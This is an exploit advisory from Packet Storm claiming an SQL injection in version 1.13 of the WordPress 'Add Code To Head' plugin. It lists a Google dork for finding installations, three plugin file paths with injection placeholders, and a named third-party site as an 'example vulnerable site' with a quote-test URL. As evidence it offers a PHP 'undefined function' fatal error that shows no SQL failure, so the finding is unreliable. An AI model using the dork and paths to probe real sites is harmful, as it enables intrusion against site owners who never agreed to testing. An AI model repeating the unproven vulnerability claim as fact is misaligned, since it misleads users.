WordPress Add Code To Head upsite_analytics_plugin 1.13 SQL Injection

2019-01-28T00:00:00
ID PACKETSTORM:151349
Type packetstorm
Reporter KingSkrupellos
Modified 2019-01-28T00:00:00

Description

                                        
                                            `####################################################################  
  
# Exploit Title : WordPress Add Code To Head upsite_analytics_plugin Plugins 1.13 SQL Injection  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 28/01/2019  
# Vendor Homepage : hbjitney.com  
# Software Download Link : downloads.wordpress.org/plugin/add-code-to-head.zip  
# Software Information Link : wordpress.org/plugins/add-code-to-head/  
# Software Version : 1.13  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/upsite_analytics_plugin/''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of   
Special Elements used in an SQL Command ('SQL Injection') ]  
  
####################################################################  
  
# Description :  
***************  
  
WordPress Add Code To Head upsite_analytics_plugin is open source software for WordPress.  
  
####################################################################  
  
# Impact :  
***********  
  
* WordPress Add Code To Head upsite_analytics_plugin Plugins 1.13 is prone to an   
  
SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied   
  
data before using it in an SQL query.  
  
* Exploiting this issue could allow an attacker to compromise the application, read,  
  
access or modify data, or exploit latent vulnerabilities in the underlying database.   
  
If the webserver is misconfigured, read & write access to the filesystem may be possible.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
  
/wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=[SQL Injection]  
  
/wp-content/plugins/upsite_analytics_plugin/plugin-updates/github-checker.php?id=[SQL Injection]  
  
/wp-content/plugins/upsite_analytics_plugin/uninstall.php?id=[SQL Injection]  
  
####################################################################  
  
# Example Vulnerable Site :  
*************************  
  
[+] tramhaltevenlo.nl/wp-content/plugins/upsite_analytics_plugin/add-code-to-head.php?id=1%27  
  
####################################################################  
  
# SQL Database Error :  
********************  
  
Fatal error: Uncaught Error: Call to undefined function wp_die() in   
/home/tramhaltevenlo/public_html/wp-content/plugins/upsite_analytics_plugin  
/uninstall.php:9 Stack trace: #0 {main} thrown in /home/tramhaltevenlo/public_html  
/wp-content/plugins/upsite_analytics_plugin/uninstall.php on line 9  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`